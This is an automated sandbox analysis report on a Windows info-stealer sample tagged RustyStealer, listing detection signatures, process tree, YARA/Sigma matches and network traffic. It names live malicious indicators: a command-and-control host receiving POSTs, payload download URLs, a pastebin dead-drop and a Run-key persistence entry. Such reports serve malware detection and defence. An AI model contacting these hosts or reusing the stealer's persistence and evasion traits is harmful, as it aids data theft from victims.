
Windows Analysis Report
ubes6SC7Vd.exe

Overview

General Information

Sample name: ubes6SC7Vd.exe
(renamed because the original name is a hash value)
Original sample name: f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb.exe
Analysis ID: 1462351
MD5: 7ddeccf7c147ea2b90426aeb43277096
SHA1: a350f7403f25add29a464491d37f56b5381d4a73
SHA256: f8880a50a9423afac856607f3a7a9759ce580fd71e8d92d480e6ec32a52378cb
Tags: 104-194-134-68, 172-86-105-109, dropped, exe, RustyStealer

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses whoami command line tool to query computer and username
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ubes6SC7Vd.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\ubes6SC7Vd.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
    • svrreve.exe (PID: 7536 cmdline: "C:\ProgramData\uovan\svrreve.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
      • WerFault.exe (PID: 7040 cmdline: C:\Windows\system32\WerFault.exe -u -p 7536 -s 2476 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • cmd.exe (PID: 7552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7620 cmdline: timeout 7 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • whoami.exe (PID: 7832 cmdline: whoami MD5: A4A6924F3EAF97981323703D38FD99C4)
  • svrreve.exe (PID: 7924 cmdline: "C:\ProgramData\uovan\svrreve.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
    • WerFault.exe (PID: 8028 cmdline: C:\Windows\system32\WerFault.exe -u -p 7924 -s 820 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svrreve.exe (PID: 8076 cmdline: "C:\ProgramData\uovan\svrreve.exe" MD5: 7DDECCF7C147EA2B90426AEB43277096)
    • WerFault.exe (PID: 8132 cmdline: C:\Windows\system32\WerFault.exe -u -p 8076 -s 832 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
Yara matches (sample):
Source: ubes6SC7Vd.exe | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: ubes6SC7Vd.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

Yara matches (dropped files):
Source: C:\ProgramData\uovan\svrreve.exe | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: C:\ProgramData\uovan\svrreve.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

Yara matches (memory dumps):
Source: 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: 00000000.00000000.1687370695.00000258F28F2000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Yara matches (unpacked PE):
Source: 0.0.ubes6SC7Vd.exe.258f28f65d4.1.raw.unpack | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: 0.0.ubes6SC7Vd.exe.258f28f0000.0.unpack | Rule: JoeSecurity_CosturaAssemblyLoader | Description: Yara detected Costura Assembly Loader | Author: Joe Security
Source: 0.0.ubes6SC7Vd.exe.258f28f0000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Sigma matches:
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\uovan\svrreve.exe", EventID: 13, EventType: SetValue, Image: C:\ProgramData\uovan\svrreve.exe, ProcessId: 7536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xohtsts
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: whoami, CommandLine: whoami, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpFD97.tmp.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: whoami, ProcessId: 7832, ProcessName: whoami.exe

No Snort rule has matched


                          AV Detection

Source: ubes6SC7Vd.exe | Avira: detected
Source: C:\ProgramData\uovan\svrreve.exe | Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\ProgramData\uovan\svrreve.exe | ReversingLabs: Detection: 44%
Source: C:\ProgramData\uovan\svrreve.exe | Virustotal: Detection: 56%
Source: ubes6SC7Vd.exe | Virustotal: Detection: 56%
Source: ubes6SC7Vd.exe | ReversingLabs: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\uovan\svrreve.exe | Joe Sandbox ML: detected
Source: ubes6SC7Vd.exe | Joe Sandbox ML: detected
Source: ubes6SC7Vd.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: ubes6SC7Vd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdb | source: ubes6SC7Vd.exe, svrreve.exe.0.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\ProgramData\uovan\svrreve.PDB | source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll | source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbw | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS7^3l | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: \??\C:\Windows\System.pdbe' | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb` | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: \assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb" | source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS# | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Core.ni.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: C:\ProgramData\uovan\svrreve.PDBm | source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.pdbSystem.Management.dll | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb0 | source: WER6CB.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbra | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9609000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbR | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD961C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb=. | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD95F9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZ | source: svrreve.exe, 00000002.00000002.2291618512.0000026DD9570000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: D:\a\bore\bore\target\x86_64-pc-windows-msvc\release\deps\bore.pdbz | source: ubes6SC7Vd.exe, svrreve.exe.0.dr
Source: Binary string: System.Configuration.ni.pdb | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Net.Http.pdb | source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: C:\ProgramData\uovan\svrreve.PDB | source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdb | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Xml.pdb | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.pdb | source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb | source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F86000.00000004.00000800.00020000.00000000.sdmp, WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Net.Http.ni.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: svrreve.PDBdQ | source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdb | source: WER2B3B.tmp.dmp.17.dr
Source: Binary string: System.Core.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: indoC:\Windows\mscorlib.pdb | source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS | source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
Source: C:\Users\user\Desktop\ubes6SC7Vd.exe | Code function: 4x nop then jmp 00007FFD9BA1745Ah | 0_2_00007FFD9BA17309
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then cmp dword ptr [ebp-58h], 00000000h | 2_2_00007FFD9BA11312
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then dec eax | 2_2_00007FFD9BA116FC
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then jmp 00007FFD9BA120ACh | 2_2_00007FFD9BA116FC
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then dec eax | 2_2_00007FFD9BA11702
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then dec eax | 2_2_00007FFD9BA116FC
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then jmp 00007FFD9BA120ACh | 2_2_00007FFD9BA116FC
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then cmp dword ptr [ebp-58h], 00000000h | 2_2_00007FFD9BA179B5
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then dec eax | 13_2_00007FFD9BA01318
Source: C:\ProgramData\uovan\svrreve.exe | Code function: 4x nop then jmp 00007FFD9BA020ACh | 13_2_00007FFD9BA01318

                          Networking

Source: unknown | DNS query: name: pastebin.com
Source: Yara match | File source: ubes6SC7Vd.exe, type: SAMPLE
Source: Yara match | File source: 0.0.ubes6SC7Vd.exe.258f28f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\ProgramData\uovan\svrreve.exe, type: DROPPED
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /raw/fR7B5m9E HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /hook/upgrade.php HTTP/1.1 | Content-Type: multipart/form-data; boundary="b52924a5-c491-4bc6-982a-722aba884181" | Host: 172.86.105.109 | Content-Length: 428 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | IP Address: 195.201.57.90
Source: Joe Sandbox View | IP Address: 195.201.57.90
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | TCP traffic detected without corresponding DNS query: 172.86.105.109
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app
Source: global traffic | HTTP traffic detected: GET /raw/fR7B5m9E HTTP/1.1 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/ HTTP/1.1 | Host: ipwhois.app | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ipwhois.app
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: unknown | HTTP traffic detected: POST /hook/upgrade.php HTTP/1.1 | Content-Type: multipart/form-data; boundary="b52924a5-c491-4bc6-982a-722aba884181" | Host: 172.86.105.109 | Content-Length: 428 | Expect: 100-continue | Connection: Keep-Alive
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E76000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, svrreve.exe.0.dr | String found in binary or memory: http://172.86.105.109
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.86.105.109(f
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F69000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.86.105.109/hook/upgrade.php
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://172.86.105.109/hook/upgrade.php2
Source: ubes6SC7Vd.exe, svrreve.exe.0.dr | String found in binary or memory: http://172.86.105.109/ups/Snup.bat
Source: ubes6SC7Vd.exe, svrreve.exe.0.dr | String found in binary or memory: http://172.86.105.109/ups/ddttd.exe
Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258800B0000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F49000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FCF000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E50000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FA6000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipwhois.app
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipwhois.app/xml/
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.17.dr | String found in binary or memory: http://upx.sf.net
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC102C000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FFB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0FEB000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0F65000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E71000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0EE3000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC1018000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: svrreve.exe.0.dr | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
Source: svrreve.exe.0.dr | String found in binary or memory: https://github.com/clap-rs/clap/issues
Source: ubes6SC7Vd.exe, svrreve.exe.0.dr | String found in binary or memory: https://github.com/clap-rs/clap/issues/rustc/84c898d65adf2f39a5a98507f1fe0ce10a2b8dbc
Source: svrreve.exe.0.dr | String found in binary or memory: https://github.com/clap-rs/clap/issuesC:
Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588025F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880206000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588028C000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.000002588022F000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801D9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880103000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.00000258801A9000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880097000.00000004.00000800.00020000.00000000.sdmp, ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880180000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0E46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipwhois.app
Source: ubes6SC7Vd.exe, svrreve.exe.0.dr | String found in binary or memory: https://ipwhois.app/xml/
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: svrreve.exe, 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/fR7B5m9E
Source: svrreve.exe, 00000002.00000002.2289800804.0000026DC0EFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/fR7B5m9EP
Source: ubes6SC7Vd.exe, 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, svrreve.exe, 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/fR7B5m9EX
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
